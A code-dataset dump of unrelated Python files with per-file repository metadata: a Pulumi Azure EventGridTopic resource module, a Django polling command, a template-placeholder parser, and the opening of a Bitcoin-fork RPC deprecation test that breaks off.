:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if inbound_ip_rules is not None:
pulumi.set(__self__, "inbound_ip_rules", inbound_ip_rules)
if input_mapping_default_values is not None:
pulumi.set(__self__, "input_mapping_default_values", input_mapping_default_values)
if input_mapping_fields is not None:
pulumi.set(__self__, "input_mapping_fields", input_mapping_fields)
if input_schema is not None:
pulumi.set(__self__, "input_schema", input_schema)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="inboundIpRules")
def inbound_ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]]:
"""
One or more `inbound_ip_rule` blocks as defined below.
"""
return pulumi.get(self, "inbound_ip_rules")
@inbound_ip_rules.setter
def inbound_ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]]):
pulumi.set(self, "inbound_ip_rules", value)
@property
@pulumi.getter(name="inputMappingDefaultValues")
def input_mapping_default_values(self) -> Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']]:
"""
A `input_mapping_default_values` block as defined below.
"""
return pulumi.get(self, "input_mapping_default_values")
@input_mapping_default_values.setter
def input_mapping_default_values(self, value: Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']]):
pulumi.set(self, "input_mapping_default_values", value)
@property
@pulumi.getter(name="inputMappingFields")
def input_mapping_fields(self) -> Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']]:
"""
A `input_mapping_fields` block as defined below.
"""
return pulumi.get(self, "input_mapping_fields")
@input_mapping_fields.setter
def input_mapping_fields(self, value: Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']]):
pulumi.set(self, "input_mapping_fields", value)
@property
@pulumi.getter(name="inputSchema")
def input_schema(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "input_schema")
@input_schema.setter
def input_schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "input_schema", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _EventGridTopicState:
def __init__(__self__, *,
endpoint: Optional[pulumi.Input[str]] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]] = None,
input_mapping_default_values: Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']] = None,
input_mapping_fields: Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']] = None,
input_schema: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
primary_access_key: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
secondary_access_key: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering EventGridTopic resources.
:param pulumi.Input[str] endpoint: The Endpoint associated with the EventGrid Topic.
:param pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs'] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input['EventGridTopicInputMappingFieldsArgs'] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] primary_access_key: The Primary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] secondary_access_key: The Secondary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if inbound_ip_rules is not None:
pulumi.set(__self__, "inbound_ip_rules", inbound_ip_rules)
if input_mapping_default_values is not None:
pulumi.set(__self__, "input_mapping_default_values", input_mapping_default_values)
if input_mapping_fields is not None:
pulumi.set(__self__, "input_mapping_fields", input_mapping_fields)
if input_schema is not None:
pulumi.set(__self__, "input_schema", input_schema)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if primary_access_key is not None:
pulumi.set(__self__, "primary_access_key", primary_access_key)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if secondary_access_key is not None:
pulumi.set(__self__, "secondary_access_key", secondary_access_key)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The Endpoint associated with the EventGrid Topic.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="inboundIpRules")
def inbound_ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]]:
"""
One or more `inbound_ip_rule` blocks as defined below.
"""
return pulumi.get(self, "inbound_ip_rules")
@inbound_ip_rules.setter
def inbound_ip_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EventGridTopicInboundIpRuleArgs']]]]):
pulumi.set(self, "inbound_ip_rules", value)
@property
@pulumi.getter(name="inputMappingDefaultValues")
def input_mapping_default_values(self) -> Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']]:
"""
A `input_mapping_default_values` block as defined below.
"""
return pulumi.get(self, "input_mapping_default_values")
@input_mapping_default_values.setter
def input_mapping_default_values(self, value: Optional[pulumi.Input['EventGridTopicInputMappingDefaultValuesArgs']]):
pulumi.set(self, "input_mapping_default_values", value)
@property
@pulumi.getter(name="inputMappingFields")
def input_mapping_fields(self) -> Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']]:
"""
A `input_mapping_fields` block as defined below.
"""
return pulumi.get(self, "input_mapping_fields")
@input_mapping_fields.setter
def input_mapping_fields(self, value: Optional[pulumi.Input['EventGridTopicInputMappingFieldsArgs']]):
pulumi.set(self, "input_mapping_fields", value)
@property
@pulumi.getter(name="inputSchema")
def input_schema(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "input_schema")
@input_schema.setter
def input_schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "input_schema", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="primaryAccessKey")
def primary_access_key(self) -> Optional[pulumi.Input[str]]:
"""
The Primary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "primary_access_key")
@primary_access_key.setter
def primary_access_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "primary_access_key", value)
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@public_network_access_enabled.setter
def public_network_access_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "public_network_access_enabled", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="secondaryAccessKey")
def secondary_access_key(self) -> Optional[pulumi.Input[str]]:
"""
The Secondary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "secondary_access_key")
@secondary_access_key.setter
def secondary_access_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secondary_access_key", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
warnings.warn("""azure.eventhub.EventGridTopic has been deprecated in favor of azure.eventgrid.Topic""", DeprecationWarning)
class EventGridTopic(pulumi.CustomResource):
warnings.warn("""azure.eventhub.EventGridTopic has been deprecated in favor of azure.eventgrid.Topic""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an EventGrid Topic
> **Note:** at this time EventGrid Topic's are only available in a limited number of regions.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_topic = azure.eventgrid.Topic("exampleTopic",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"environment": "Production",
})
```
## Import
EventGrid Topic's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:eventhub/eventGridTopic:EventGridTopic topic1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.EventGrid/topics/topic1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: EventGridTopicArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an EventGrid Topic
> **Note:** at this time EventGrid Topic's are only available in a limited number of regions.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_topic = azure.eventgrid.Topic("exampleTopic",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"environment": "Production",
})
```
## Import
EventGrid Topic's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:eventhub/eventGridTopic:EventGridTopic topic1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.EventGrid/topics/topic1
```
:param str resource_name: The name of the resource.
:param EventGridTopicArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(EventGridTopicArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
pulumi.log.warn("""EventGridTopic is deprecated: azure.eventhub.EventGridTopic has been deprecated in favor of azure.eventgrid.Topic""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = EventGridTopicArgs.__new__(EventGridTopicArgs)
__props__.__dict__["inbound_ip_rules"] = inbound_ip_rules
__props__.__dict__["input_mapping_default_values"] = input_mapping_default_values
__props__.__dict__["input_mapping_fields"] = input_mapping_fields
__props__.__dict__["input_schema"] = input_schema
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["endpoint"] = None
__props__.__dict__["primary_access_key"] = None
__props__.__dict__["secondary_access_key"] = None
super(EventGridTopic, __self__).__init__(
'azure:eventhub/eventGridTopic:EventGridTopic',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
endpoint: Optional[pulumi.Input[str]] = None,
inbound_ip_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]]] = None,
input_mapping_default_values: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']]] = None,
input_mapping_fields: Optional[pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']]] = None,
input_schema: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
primary_access_key: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
secondary_access_key: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'EventGridTopic':
"""
Get an existing EventGridTopic resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] endpoint: The Endpoint associated with the EventGrid Topic.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventGridTopicInboundIpRuleArgs']]]] inbound_ip_rules: One or more `inbound_ip_rule` blocks as defined below.
:param pulumi.Input[pulumi.InputType['EventGridTopicInputMappingDefaultValuesArgs']] input_mapping_default_values: A `input_mapping_default_values` block as defined below.
:param pulumi.Input[pulumi.InputType['EventGridTopicInputMappingFieldsArgs']] input_mapping_fields: A `input_mapping_fields` block as defined below.
:param pulumi.Input[str] input_schema: Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] primary_access_key: The Primary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] secondary_access_key: The Secondary Shared Access Key associated with the EventGrid Topic.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _EventGridTopicState.__new__(_EventGridTopicState)
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["inbound_ip_rules"] = inbound_ip_rules
__props__.__dict__["input_mapping_default_values"] = input_mapping_default_values
__props__.__dict__["input_mapping_fields"] = input_mapping_fields
__props__.__dict__["input_schema"] = input_schema
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["primary_access_key"] = primary_access_key
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["secondary_access_key"] = secondary_access_key
__props__.__dict__["tags"] = tags
return EventGridTopic(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[str]:
"""
The Endpoint associated with the EventGrid Topic.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="inboundIpRules")
def inbound_ip_rules(self) -> pulumi.Output[Optional[Sequence['outputs.EventGridTopicInboundIpRule']]]:
"""
One or more `inbound_ip_rule` blocks as defined below.
"""
return pulumi.get(self, "inbound_ip_rules")
@property
@pulumi.getter(name="inputMappingDefaultValues")
def input_mapping_default_values(self) -> pulumi.Output[Optional['outputs.EventGridTopicInputMappingDefaultValues']]:
"""
A `input_mapping_default_values` block as defined below.
"""
return pulumi.get(self, "input_mapping_default_values")
@property
@pulumi.getter(name="inputMappingFields")
def input_mapping_fields(self) -> pulumi.Output[Optional['outputs.EventGridTopicInputMappingFields']]:
"""
A `input_mapping_fields` block as defined below.
"""
return pulumi.get(self, "input_mapping_fields")
@property
@pulumi.getter(name="inputSchema")
def input_schema(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the schema in which incoming events will be published to this domain. Allowed values are `CloudEventSchemaV1_0`, `CustomEventSchema`, or `EventGridSchema`. Defaults to `EventGridSchema`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "input_schema")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the EventGrid Topic resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="primaryAccessKey")
def primary_access_key(self) -> pulumi.Output[str]:
"""
The Primary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "primary_access_key")
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the EventGrid Topic exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="secondaryAccessKey")
def secondary_access_key(self) -> pulumi.Output[str]:
"""
The Secondary Shared Access Key associated with the EventGrid Topic.
"""
return pulumi.get(self, "secondary_access_key")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 51.916042
| 294
| 0.692705
|
4a188fc5e3ef7ae9d8ca69c2affdf7259e61127e
| 439
|
py
|
Python
|
clerk/management/commands/clerk_worker.py
|
mingaleg/yakubovich
|
95398c78eaffbd6ff69f8fdbedfc847531219d8a
|
[
"MIT"
] | 5
|
2018-12-12T16:24:42.000Z
|
2020-02-29T18:45:30.000Z
|
clerk/management/commands/clerk_worker.py
|
mingaleg/yakubovich
|
95398c78eaffbd6ff69f8fdbedfc847531219d8a
|
[
"MIT"
] | 3
|
2020-06-05T17:47:13.000Z
|
2022-02-11T03:39:54.000Z
|
clerk/management/commands/clerk_worker.py
|
mingaleg/yakubovich
|
95398c78eaffbd6ff69f8fdbedfc847531219d8a
|
[
"MIT"
] | null | null | null |
from time import sleep
from django.core.management.base import BaseCommand, CommandError
from ...models import Contest
class Command(BaseCommand):
help = 'Runs clerk routine'
def handle(self, *args, **options):
try:
while True:
for contest in Contest.objects.all():
contest.pull_new_submissions()
sleep(1)
except InterruptedError:
pass
| 25.823529
| 65
| 0.605923
|
4a18900fa4ad449c23a5ffe0427f257099441318
| 4,640
|
py
|
Python
|
tyrannosaurus/parser.py
|
oehs7/tyrannosaurus
|
70a650f194bc8f2bd178b76c0256c34645ebfe8e
|
[
"Apache-2.0"
] | 63
|
2020-05-06T21:48:01.000Z
|
2022-03-24T21:10:20.000Z
|
tyrannosaurus/parser.py
|
dmyersturnbull/tyrannosaurus
|
a369dafc45963e8cb2db2f12e7747191043eac30
|
[
"Apache-2.0"
] | 119
|
2020-05-07T23:07:24.000Z
|
2022-03-28T18:04:52.000Z
|
tyrannosaurus/parser.py
|
oehs7/tyrannosaurus
|
70a650f194bc8f2bd178b76c0256c34645ebfe8e
|
[
"Apache-2.0"
] | 6
|
2020-05-16T05:36:47.000Z
|
2022-02-24T13:47:23.000Z
|
"""
Parsing of various files.
Original source: https://github.com/dmyersturnbull/tyrannosaurus
Copyright 2020–2021 Douglas Myers-Turnbull
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0
"""
from typing import Any, Optional, Sequence, Union
from tyrannosaurus import TyrannoInfo
from tyrannosaurus.enums import DevStatus, License
class LiteralParser:
def __init__(
self,
project: str,
user: Optional[str],
authors: Optional[Sequence[str]],
description: str,
keywords: Sequence[str],
version: str,
status: DevStatus,
license_name: Union[str, License],
tyranno_vr: str,
):
self.project = project.lower()
# TODO doing this in two places
self.pkg = project.replace("_", "").replace("-", "").replace(".", "").lower()
self.user = user
self.authors = authors
self.description = description
self.keywords = keywords
self.version = version
self.status = status
self.license = License.of(license_name)
self.tyranno_vr = tyranno_vr
def parse(self, s: str) -> str:
today, now, now_utc = TyrannoInfo.today, TyrannoInfo.now, TyrannoInfo.now_utc
timestamp, utc_stamp = (
TyrannoInfo.pretty_timestamp_with_offset,
TyrannoInfo.pretty_timestamp_utc,
)
reps = {
"today": str(today),
"today.str": today.strftime("%Y-%m-%d"),
"today.year": str(today.year),
"today.month": str(today.month),
"today.Month": today.strftime("%B"),
"today.day": str(today.day),
"now": timestamp,
"now.utc": utc_stamp,
"now.iso": now.replace(microsecond=0).isoformat(),
"now.utciso": now_utc.replace(microsecond=0).isoformat(),
"now.hour": str(now.hour),
"now.minute": str(now.minute),
"now.second": str(now.second),
"project": self.project.lower(),
"Project": self.project.capitalize(),
"PROJECT": self.project.upper(),
"pkg": self.pkg,
"Pkg": self.pkg.title(),
"user": "<<TODO:user>>" if self.user is None else self.user,
"authors": self._pretty(self.authors),
"authors.list": self._list(self.authors),
"version": self.version,
"status.Name": self.status.name.capitalize(),
"status.name": self.status.name,
"status.pypi": self.status.pypi,
"status.dunder": self.status.dunder,
"status.Description": self.status.description.capitalize(),
"status.Description.": self._sentence(self.status.description),
"status.description": self.status.description,
"Description": self.description.capitalize(),
"description": self.description,
"Description.": self._sentence(self.description),
"keywords": self._pretty(self.keywords),
"keywords.list": self._list(self.keywords),
"license": self.license.name,
"license.name": self.license.full_name,
"license.spdx": self.license.spdx,
"license.official": self.license.spdx,
"license.family": self.license.family,
"license.header": self.download_license_template(header=True),
"license.full": self.download_license_template(header=False),
"license.url": self.license.url,
"tyranno.version": self.tyranno_vr,
}
for k, v in reps.items():
s = s.replace("$${" + k + "}", v)
return s
def download_license_template(self, header: bool) -> str:
text = self.license.download_header() if header else self.license.download_license()
return (
text.replace("{{ organization }}", ", ".join(self.authors))
.replace("{{ year }}", str(TyrannoInfo.today.year))
.replace("{{ project }}", self.project)
)
def _sentence(self, v: str) -> str:
return v.capitalize().strip(".") + "."
def _pretty(self, v: Optional[Sequence[Any]]) -> str:
if v is None:
v = []
return ", ".join(['"' + str(k) + '"' for k in v])
def _list(self, v: Optional[Sequence[Any]]) -> str:
if v is None:
v = []
return "[" + ", ".join(['"' + str(k) + '"' for k in v]) + "]"
__all__ = ["LiteralParser"]
| 38.991597
| 92
| 0.575431
|
4a189027d916d993bf0de1946da105435c7affd6
| 4,831
|
py
|
Python
|
test/functional/rpc_deprecated.py
|
cibadmin/GLBTC
|
52a0c8bfcb7abce8f97412dd1fd817335657896b
|
[
"MIT"
] | null | null | null |
test/functional/rpc_deprecated.py
|
cibadmin/GLBTC
|
52a0c8bfcb7abce8f97412dd1fd817335657896b
|
[
"MIT"
] | null | null | null |
test/functional/rpc_deprecated.py
|
cibadmin/GLBTC
|
52a0c8bfcb7abce8f97412dd1fd817335657896b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test deprecation of RPC calls."""
from test_framework.test_framework import GlobalBitcoinTestFramework
from test_framework.util import assert_raises_rpc_error
class DeprecatedRpcTest(GlobalBitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [[], ["-deprecatedrpc=validateaddress", "-deprecatedrpc=accounts"]]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
